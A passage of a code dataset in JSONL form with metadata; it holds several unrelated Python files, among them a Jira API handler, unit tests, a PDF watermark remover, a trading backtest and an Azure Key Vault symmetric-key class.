start_state=board_config.lead_time_start_state,\n end_state=board_config.lead_time_end_state,\n session=session)\n session.close()\n except Exception:\n rollback_and_close(session)\n payload = {'message': 'Internal error'}\n raise ApiResponseError(status_code=500, body=payload)\n", 
"sub_path": "source/web_api/update_work_states/update_work_states.py", "file_name": "update_work_states.py", "file_ext": "py", "file_size_in_byte": 3451, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "utils.api_response_helper.api_response_handler", "line_number": 14, "usage_type": "call"}, {"api_name": "utils.api_response_helper.response_formatter", "line_number": 21, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.jira_helper.JiraBoardConfiguration.JiraBoardConfiguration", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.api_response_helper.ApiResponseError", "line_number": 33, "usage_type": "call"}, {"api_name": "utils.api_response_helper.ApiResponseError", "line_number": 41, "usage_type": "call"}, {"api_name": "vger_commons.database_connection.sql_alchemy_session.SqlAlchemySession", "line_number": 45, "usage_type": "call"}, {"api_name": "vger_commons.database_connection.sql_alchemy_session.update_team_status_states", "line_number": 58, "usage_type": "call"}, {"api_name": "vger_commons.database_connection.sql_alchemy_session.update_team_work_states", "line_number": 61, "usage_type": "call"}, {"api_name": "vger_commons.database_connection.sql_alchemy_session.update_default_lead_time_states", "line_number": 64, "usage_type": "call"}, {"api_name": "vger_commons.database_connection.sql_alchemy_session.rollback_and_close", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.api_response_helper.ApiResponseError", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "181286151", "text": "import requests\nimport datetime\n\nurl = 'http://localhost:57004/api/CloudData?metaObjectCode=WangDongApp.DataTest'\n\ni = 90000\n\ndata = {\n 'positiveNumber': i,\n 'Text': 'Text测试'+str(i),\n 'DateTime': str(datetime.datetime.now()),\n 'TrueOrFalse': True,\n 'Integer': i,\n 'Long': i,\n 'Double': i\n}\nresponse = requests.post(url, json=data)\nprint(response.text)\n", "sub_path": "60-Tools/api_post.py", "file_name": "api_post.py", "file_ext": "py", "file_size_in_byte": 377, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "213659678", "text": "import xlrd\nimport sys\nimport json\nfrom parser import get_text_and_colors, advance\n\nbook = xlrd.open_workbook(sys.argv[1], formatting_info=True)\nstart_row = 11\nstart_col = 3\nnum_time_slots = 16\nnum_days = 30\nnum_merged_columns = 5\noutput = []\nskipped_cx = [12, 20, 22, 18, 5]\ni = 1\n\nfor row in get_text_and_colors(book, start_row, start_col, num_days ,num_time_slots + num_merged_columns):\n hour = 6\n minute = 30\n d = '2017-12-%.2d' % (i)\n schedule = []\n j = 0\n for time_slot in row:\n text, color, column = time_slot\n if column in skipped_cx:\n continue\n if color == '#FFCC9A':\n text = '可用'\n for k in range(0, 2 if j > 0 else 1):\n schedule.append({\n 'time': '%.2d:%.2d' % (hour, minute),\n 'status': text,\n }) \n hour, minute = advance(hour, minute)\n j += 1\n output.append({'date': d, 'schedule': schedule, 'id': 488})\n i += 1\n\nwith open(sys.argv[2], 'w') as f:\n f.write(json.dumps(output, indent=4))\n", "sub_path": "convert.py", "file_name": "convert.py", "file_ext": "py", 
"file_size_in_byte": 1049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "xlrd.open_workbook", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "parser.get_text_and_colors", "line_number": 16, "usage_type": "call"}, {"api_name": "parser.advance", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 38, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "169317609", "text": "import pytest\nfrom advtraj.utils import grid as grid_utils\n\nfrom utils import create_uniform_grid\nimport xarray as xr\nimport numpy as np\n\n\ndef test_wrap_coord_posn():\n Lx = 1000.0\n x = np.array([-100.0, 0.0, Lx / 2.0, Lx, Lx + 100.0])\n x_wrapped_true = np.array([Lx - 100.0, 0.0, Lx / 2.0, 0.0, 100.0])\n x_wrapped = grid_utils.wrap_posn(x=x, x_min=0.0, x_max=Lx)\n np.testing.assert_allclose(x_wrapped_true, x_wrapped)\n\n\n@pytest.mark.parametrize(\"cell_centered\", [True, False])\ndef test_cyclic_coord_wrapping(cell_centered):\n dx = 25.0\n dL = (dx, dx, dx)\n L = (1.0e3, 1.0e3, 500.0)\n ds_grid = create_uniform_grid(dL=dL, L=L, cell_centered=cell_centered)\n\n Lx_c, Ly_c, Lz_c = [L[0] / 2.0, L[1] / 2.0, L[2] / 2.0]\n Lx, Ly, Lz = L\n\n start_and_wrapped_pt_coords = [\n # a point in the center of the domain should remain the same\n ((Lx_c, Ly_c, Lz_c), (Lx_c, Ly_c, Lz_c)),\n # wrapping in x should map these points to domain center\n ((Lx_c - Lx, Ly_c, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ((Lx_c + Lx, Ly_c, Lz_c), (Lx_c, Ly_c, Lz_c)),\n # same in y\n ((Lx_c, Ly_c - Ly, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ((Lx_c, Ly_c + Ly, Lz_c), (Lx_c, Ly_c, Lz_c)),\n # repeats for two wraps\n ((Lx_c - 2 * Lx, Ly_c, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ((Lx_c + 2 * Lx, Ly_c, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ((Lx_c, Ly_c - 2 * Ly, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ((Lx_c, Ly_c + 2 * Ly, Lz_c), (Lx_c, Ly_c, Lz_c)),\n ]\n\n def _make_pt_dataset(pt):\n ds_pt = xr.Dataset()\n for n, v in enumerate([\"x\", \"y\", \"z\"]):\n ds_pt[v] = pt[n]\n return ds_pt\n\n def _pt_from_dataset(ds_pt):\n return np.array([ds_pt[v] for v in [\"x\", \"y\", \"z\"]])\n\n if cell_centered:\n cell_centered_coords = [\"x\", \"y\", \"z\"]\n else:\n cell_centered_coords = []\n\n for pt_start, pt_wrapped_correct in start_and_wrapped_pt_coords:\n ds_pt_start = _make_pt_dataset(pt_start)\n ds_pt_wrapped = grid_utils.wrap_periodic_grid_coords(\n ds_grid=ds_grid,\n ds_posn=ds_pt_start,\n cyclic_coords=(\"x\", \"y\"),\n cell_centered_coords=cell_centered_coords,\n )\n\n np.testing.assert_allclose(_pt_from_dataset(ds_pt_wrapped), pt_wrapped_correct)\n", "sub_path": "tests/test_grid_utils.py", "file_name": "test_grid_utils.py", "file_ext": "py", "file_size_in_byte": 2297, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "advtraj.utils.grid.wrap_posn", "line_number": 13, "usage_type": "call"}, {"api_name": "advtraj.utils.grid", "line_number": 13, "usage_type": "name"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 14, "usage_type": "attribute"}, {"api_name": "utils.create_uniform_grid", "line_number": 22, "usage_type": "call"}, {"api_name": "xarray.Dataset", 
"line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "advtraj.utils.grid.wrap_periodic_grid_coords", "line_number": 59, "usage_type": "call"}, {"api_name": "advtraj.utils.grid", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 17, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "596864026", "text": "import os\nimport PIL\nimport pdf2image\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\n# dots per inch (dpi) adjusts quality and file size\nimages = pdf2image.convert_from_path('files/lurie.pdf', dpi = 300)\n\ndef find_watermark_colors(im):\n\n im_width, im_height = im.size\n pixels = im.load()\n\n colors_to_freq = defaultdict(int)\n\n for y in range(im_height):\n\n line_pixels = set()\n\n contains_black = False\n\n for x in range(im_width):\n\n current_pixel = im.getpixel((x, y))\n\n if current_pixel == (0, 0, 0):\n contains_black = True\n break\n else:\n line_pixels.add(current_pixel)\n\n if not contains_black:\n no_white = line_pixels - set([(255, 255, 255)])\n\n if no_white:\n colors_to_freq[tuple(list(no_white))] += 1\n\n watermark_colors = set(list(sorted(colors_to_freq, key = colors_to_freq.get, reverse = True)[0]))\n\n return(watermark_colors)\n\nwatermark_colors = find_watermark_colors(images[0])\n\nfor im in tqdm(images, desc = \"Images: \"):\n\n im_width, im_height = im.size\n pixels = im.load()\n\n for y in range(im_height):\n\n for x in range(im_width):\n\n if im.getpixel((x, y)) in watermark_colors:\n pixels[x, y] = (255, 255, 255)\n\nimages[0].save(\"files/out.pdf\", save_all = True, append_images = images[1:], subsampling=0, quality=100)\n", "sub_path": "remove.py", "file_name": "remove.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pdf2image.convert_from_path", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "393220530", "text": "from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport time\n\n\ndef clr_declaration_search(driver):\n time.sleep(1)\n driver.find_element_by_xpath(\".//*[@id='msg10135']/a/span[2]\").click()\n # Select menu: Clearance -> Declaration\n\ndef clr_declaration_simple(driver):\n time.sleep(1)\n locator = (By.XPATH, \".//*[@id='msg10136']\")\n WebDriverWait(driver, 10, 0.1).until(ec.element_to_be_clickable(locator))\n # driver.implicitly_wait(30)\n driver.find_element_by_xpath(\".//*[@id='msg10136']\").click()\n # Select menu: Clearance -> Declaration -> Capture a simple SAD\n\n\ndef clr_loader_upload(driver):\n time.sleep(1)\n driver.find_element_by_xpath(\".//*[@id='msg11168']/a/span[2]\").click()\n\n\n", "sub_path": "DirectTax/CLR/clr_submenu.py", "file_name": "clr_submenu.py", "file_ext": "py", "file_size_in_byte": 830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "time.sleep", "line_number": 8, "usage_type": "call"}, 
{"api_name": "time.sleep", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 14, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 14, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.wait.WebDriverWait", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "641923258", "text": "# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nimport uuid\nimport os\nfrom .key import Key\nfrom .algorithms.aes_cbc import Aes256Cbc, Aes192Cbc, Aes128Cbc\nfrom .algorithms.aes_cbc_hmac import Aes256CbcHmacSha512, Aes192CbcHmacSha384, Aes128CbcHmacSha256\nfrom .algorithms.aes_kw import AesKw256, AesKw192, AesKw128\n\nkey_size_128 = 128 >> 3\nkey_size_192 = 192 >> 3\nkey_size_256 = 256 >> 3\nkey_size_384 = 384 >> 3\nkey_size_512 = 512 >> 3\n\n_default_key_size = key_size_256\n\n_supported_key_sizes = [key_size_128, key_size_192, key_size_256, key_size_384, key_size_512]\n\n_default_enc_alg_by_size = {\n key_size_128: Aes128Cbc.name(),\n key_size_192: Aes192Cbc.name(),\n key_size_256: Aes128CbcHmacSha256.name(),\n key_size_384: Aes192CbcHmacSha384.name(),\n key_size_512: Aes256CbcHmacSha512.name(),\n}\n\n_default_kw_alg_by_size = {\n key_size_128: AesKw128.name(),\n key_size_192: AesKw192.name(),\n key_size_256: AesKw256.name(),\n key_size_384: AesKw256.name(),\n key_size_512: AesKw256.name(),\n}\n\n\nclass SymmetricKey(Key):\n def __init__(self, kid=None, key_bytes=None, key_size=None):\n super(SymmetricKey, self).__init__()\n\n self._kid = kid or str(uuid.uuid4())\n\n if not key_bytes:\n key_size = key_size or _default_key_size\n\n if key_size not in _supported_key_sizes:\n raise ValueError(\"The key size must be 128, 192, 256, 384 or 512 bits of data\")\n\n key_bytes = os.urandom(key_size)\n\n if len(key_bytes) not in _supported_key_sizes:\n raise ValueError(\"The key size must be 128, 192, 256, 384 or 512 bits of data\")\n\n self._key = key_bytes\n\n def is_private_key(self):\n return True\n\n @classmethod\n def from_jwk(cls, jwk):\n return cls(kid=jwk.kid, key_bytes=jwk.k)\n\n @property\n def kid(self):\n return self._kid\n\n @property\n def default_encryption_algorithm(self):\n return _default_enc_alg_by_size[len(self._key)]\n\n @property\n def default_key_wrap_algorithm(self):\n return _default_kw_alg_by_size[len(self._key)]\n\n @property\n def supported_encryption_algorithms(self):\n supported = []\n key_size = len(self._key)\n\n if key_size >= key_size_128:\n supported.append(Aes128Cbc.name())\n if key_size >= key_size_192:\n supported.append(Aes192Cbc.name())\n if key_size >= key_size_256:\n supported.append(Aes256Cbc.name())\n supported.append(Aes128CbcHmacSha256.name())\n if key_size >= key_size_384:\n supported.append(Aes192CbcHmacSha384.name())\n if key_size >= key_size_512:\n supported.append(Aes256CbcHmacSha512.name())\n\n return supported\n\n @property\n def supported_key_wrap_algorithms(self):\n supported = []\n key_size = len(self._key)\n\n if key_size >= key_size_128:\n supported.append(AesKw128.name())\n if key_size >= key_size_192:\n supported.append(AesKw192.name())\n if 
key_size >= key_size_256:\n supported.append(AesKw256.name())\n\n return supported\n\n def encrypt(self, plain_text, iv, **kwargs): # pylint:disable=arguments-differ\n algorithm = self._get_algorithm(\"encrypt\", **kwargs)\n encryptor = algorithm.create_encryptor(key=self._key, iv=iv)\n return encryptor.transform(plain_text, **kwargs)\n\n def decrypt(self, cipher_text, iv, **kwargs): # pylint:disable=arguments-differ\n algorithm = self._get_algorithm(\"decrypt\", **kwargs)\n decryptor = algorithm.create_decryptor(key=self._key, iv=iv)\n return decryptor.transform(cipher_text, **kwargs)\n\n def wrap_key(self, key, **kwargs):\n algorithm = self._get_algorithm(\"wrapKey\", **kwargs)\n encryptor = algorithm.create_encryptor(key=self._key)\n return encryptor.transform(key)\n\n def unwrap_key(self, encrypted_key, **kwargs):\n algorithm = self._get_algorithm(\"unwrapKey\", **kwargs)\n decryptor = algorithm.create_decryptor(key=self._key)\n return decryptor.transform(encrypted_key)\n\n def sign(self, digest, **kwargs):\n raise NotImplementedError()\n\n def verify(self, digest, signature, **kwargs):\n raise NotImplementedError()\n", "sub_path": "sdk/keyvault/azure-keyvault-keys/azure/keyvault/keys/crypto/_internal/symmetric_key.py", "file_name": "symmetric_key.py", "file_ext": "py", "file_size_in_byte": 4360, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "algorithms.aes_cbc.Aes128Cbc.name", "line_number": 23, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes128Cbc", "line_number": 23, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc.Aes192Cbc.name", "line_number": 24, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes192Cbc", "line_number": 24, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes128CbcHmacSha256.name", "line_number": 25, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes128CbcHmacSha256", "line_number": 25, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes192CbcHmacSha384.name", "line_number": 26, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes192CbcHmacSha384", "line_number": 26, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes256CbcHmacSha512.name", "line_number": 27, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes256CbcHmacSha512", "line_number": 27, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw128.name", "line_number": 31, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw128", "line_number": 31, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw192.name", "line_number": 32, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw192", "line_number": 32, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw256.name", "line_number": 33, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw256", "line_number": 33, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw256.name", "line_number": 34, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw256", "line_number": 34, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw256.name", "line_number": 35, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw256", "line_number": 35, "usage_type": "name"}, {"api_name": "key.Key", "line_number": 39, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 43, "usage_type": "call"}, {"api_name": "os.urandom", "line_number": 51, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes128Cbc.name", 
"line_number": 83, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes128Cbc", "line_number": 83, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc.Aes192Cbc.name", "line_number": 85, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes192Cbc", "line_number": 85, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc.Aes256Cbc.name", "line_number": 87, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc.Aes256Cbc", "line_number": 87, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes128CbcHmacSha256.name", "line_number": 88, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes128CbcHmacSha256", "line_number": 88, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes192CbcHmacSha384.name", "line_number": 90, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes192CbcHmacSha384", "line_number": 90, "usage_type": "name"}, {"api_name": "algorithms.aes_cbc_hmac.Aes256CbcHmacSha512.name", "line_number": 92, "usage_type": "call"}, {"api_name": "algorithms.aes_cbc_hmac.Aes256CbcHmacSha512", "line_number": 92, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw128.name", "line_number": 102, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw128", "line_number": 102, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw192.name", "line_number": 104, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw192", "line_number": 104, "usage_type": "name"}, {"api_name": "algorithms.aes_kw.AesKw256.name", "line_number": 106, "usage_type": "call"}, {"api_name": "algorithms.aes_kw.AesKw256", "line_number": 106, "usage_type": "name"}]} +{"seq_id": "559137578", "text": "#!/usr/bin/python\n\nimport os, sys\nimport argparse as ap\npl_path = os.path.expanduser(\"~bharden1/scripts/lib/python/peaklists\")\nsys.path.append(pl_path)\nimport peaklists as pl\n\ndescription = \"\"\"\nlinks2tab.py will convert a 3D or 4D CARA strip peak list into an\nnmrPipe tab file. It will also add the appropriate columns to fit each\npeak to an N-dimensional Gaussian using nlinLS.\n\\n\\n\nEach strip peak list should correspond to a particular NOESY spectrum.\nThe script needs access to the header of the NOESY spectrum to correctly\ncalculate the location of each peak in units of points. Thus, the two\nrequired arguments for the conversion are the strip peak list and its\ncorresponding nmrPipe spectrum. The spectrum can be either a monolithic\nfile or the first plane from a series. DO NOT USE A .PIPE FILE HERE.\nOnly use a .ft* file.\n\\n\\n\nThe order of the columns in the strip peak list may not match the order\nof dimensions in the corresponding spectrum. Use the option --order to\nspecify which column (from left to right) corresponds to which dimension\n(XYZA) in the nmrPipe spectrum. The default is XYZ.\n\\n\\n\nUse the --cal option to enter the calibration for each dimension. The\norder here should match the order of dimensions in the strip peak list.\nThese values should be the same as the calibration values in CARA.\n\\n\\n\nFinally, a strip peak list does not contain assignment data directly.\nIt only provides the spin ID numbers from CARA. If you supply a seq file\nand a prot file from CARA using the --seq and --prot options, the script\ncan resolve the spin IDs into their actual residues and atom names. It\nis highly recommended that you supply a prot file. 
Without it, you will\nfind that it is extremely difficult to identify peaks in the tab file.\n\"\"\"\nparser = ap.ArgumentParser(description=description,\n formatter_class=ap.RawDescriptionHelpFormatter)\nrequired = parser.add_argument_group('required arguments')\nrequired.add_argument('--ft', dest='ft_file', metavar='test.ft*',\n type=str, required=True,\n help='nmrPipe spectrum or plane (NOT .pipe file)')\nrequired.add_argument('--in', dest='peak_file', metavar='links.peaks',\n type=str, required=True, help='strip peaklist')\nparser.add_argument('--seq', dest='seq_file', metavar='protein.seq',\n type=str, default=None, help='seq file')\nparser.add_argument('--prot', dest='prot_file', metavar='atoms.prot',\n type=str, default=None, help='prot file')\nparser.add_argument('--out', dest='tab_file', metavar='links.tab',\n type=str, default='links.tab',\n help='nlinLS tab file (default links.tab)')\nparser.add_argument('--order', dest='dim_order', metavar='ORDER', type=str,\n help='correspondence between peak list columns (left to ' +\n 'right) and spectrum dimensions (XYZA), default XYZ')\nparser.add_argument('--cal', dest='cal', metavar='C', nargs='*',\n type=float, help='calibration for each dimension (PPM)')\n\nVOLUME = (('volume', ('VOL', '%11.4e')), )\nNDGAUSSIAN = (('height', ('HEIGHT', '%11.4e')), ('widths', ('%sW', '%5.2f')))\nVOLUME_GAUSSIAN = VOLUME + NDGAUSSIAN\n\nargs = parser.parse_args()\npeaklist = pl.read_peaks_file(args.peak_file, tab_dict=VOLUME_GAUSSIAN,\n spectrum=args.ft_file, seq_file=args.seq_file,\n atom_list=args.prot_file)\npeaklist.clear_peak_indices()\npeaklist.set_peak_defaults(volume=0.0, height=5e7, widths=[3.0]*peaklist.dims)\nif args.cal is not None:\n peaklist.calibrate(args.cal)\nif args.dim_order is not None:\n peaklist.dim_order = args.dim_order\nif args.prot_file is not None:\n peaklist.sort_by_assignments()\npeaklist.write_tab_file(args.tab_file, remark='Converted with links2tab.py')\n", "sub_path": "examples/links2tab.py", "file_name": "links2tab.py", "file_ext": "py", "file_size_in_byte": 3865, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.path.expanduser", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 38, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 39, "usage_type": "attribute"}, {"api_name": "peaklists.read_peaks_file", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "231994884", "text": "#!/usr/bin/env python\nimport numpy as np\nimport h5py\nimport argparse\n\n# Assume all arrays are same dimensions\n\nparser = argparse.ArgumentParser(description='merge hdf5 files')\nparser.add_argument('-files', required=True, type=str, nargs='+')\nparser.add_argument('-out', required=True, type=str, help='output file name')\nparser.add_argument('--stackaxis', default=1, type=int, help='Axis choosen to stack reads in output dataset for HDF5 file.')\n\nargs = parser.parse_args()\n\nout = args.out\nif not out.endswith('.h5'):\n out += '.h5'\n\nmats = []\nfor f in args.files:\n fi = h5py.File(f, 'r')\n mats.append(fi['reads'][:]) \n fi.close()\nM = np.stack(mats, args.stackaxis)\n\nf = h5py.File(out, 'w')\nf.create_dataset('reads', M.shape, data=M, dtype='i', 
compression='gzip', compression_opts=9)\nf.close()", "sub_path": "python-array-utils/src/merge_hdf5.py", "file_name": "merge_hdf5.py", "file_ext": "py", "file_size_in_byte": 807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 24, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "482652361", "text": "from johansen_test import coint_johansen\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom functions import *\r\nfrom numpy.matlib import repmat\r\nimport numpy as np\r\n\r\n# Implementation of the second part of example 3.1 in Ernest Chang's \r\n# book Algorithmic trading : winning strategies and their rationale.\r\n#\r\n# log(Price) Spread\r\n\r\nif __name__ == \"__main__\":\r\n \r\n #import data from CSV file\r\n root_path = 'C:/Users/javgar119/Documents/Python/Data/'\r\n # the paths\r\n # MAC: '/Users/Javi/Documents/MarketData/'\r\n # WIN: 'C:/Users/javgar119/Documents/Python/Data'\r\n filename = 'GLD_USO_daily2.csv'\r\n full_path = root_path + filename\r\n data = pd.read_csv(full_path, index_col='Date')\r\n \r\n y_ticket = 'USO'\r\n x_ticket = 'GLD'\r\n \r\n y = data[y_ticket]\r\n x = data[x_ticket]\r\n \r\n\r\n # lookback period for calculating the dynamically changing\r\n lookback = 20\r\n modelo = pd.ols(y=np.log(y), x=np.log(x), window_type='rolling', window=lookback)\r\n data = data[lookback-1:]\r\n betas = modelo.beta\r\n \r\n # calculate the number of units for the strategy in the form\r\n # y-beta*x\r\n yport = pd.DataFrame(np.log(data[y_ticket]) - (betas['x'] * np.log(data[x_ticket])))\r\n \r\n moving_mean = pd.rolling_mean(yport, window=lookback)\r\n moving_std = pd.rolling_std(yport,window=lookback)\r\n # the number of units of the syntetic portfolio is given by the\r\n # negative value of z-score\r\n numunits = pd.DataFrame(-(yport - moving_mean) / moving_std)\r\n\r\n # compute the $ position for each asset\r\n AA = pd.DataFrame(repmat(numunits,1,2))\r\n BB = pd.DataFrame(-betas['x'])\r\n BB['ones'] = np.ones((len(betas)))\r\n position = multiply(multiply(AA, BB), data)\r\n\r\n # compute the daily pnl in $$\r\n pnl = sum(multiply(position[:-1], divide(diff(data,axis = 0), data[:-1])),1)\r\n \r\n \r\n # gross market value of portfolio\r\n mrk_val = pd.DataFrame.sum(abs(position), axis=1)\r\n mrk_val = mrk_val[:-1]\r\n \r\n # return is P&L divided by gross market value of portfolio\r\n rtn = pnl / mrk_val\r\n \r\n # compute performance statistics\r\n sharpe = (np.sqrt(252)*np.mean(rtn)) / np.std(rtn)\r\n APR = np.prod(1+rtn)**(252/len(rtn))-1\r\n \r\n ##################################################\r\n # print the results\r\n ##################################################\r\n print('Price spread Sharpe: {:.4}'.format(sharpe))\r\n print('Price Spread APR: {:.4%}'.format(APR))\r\n \r\n \r\n #*************************************************\r\n # plotting the chart\r\n #************************************************* \r\n #plot of numunits\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n ax.plot(cumsum(rtn))\r\n ax.set_title('{}-{} log(Price) Spread Acum Return'.format(x_ticket, y_ticket))\r\n ax.set_xlabel('Data points')\r\n ax.set_ylabel('acumm rtn')\r\n ax.text(1000, 0, 'Sharpe: {:.4}'.format(sharpe))\r\n ax.text(1000, -0.03, 'APR: 
{:.4%}'.format(APR))\r\n \r\n \r\n \r\n plt.show()", "sub_path": "EChanBook2/example_3_1_b.py", "file_name": "example_3_1_b.py", "file_ext": "py", "file_size_in_byte": 3028, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.ols", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}]} +{"seq_id": "234130693", "text": "#< ---- 20 char ---->< ---- 20 char --->< ---- 20 char 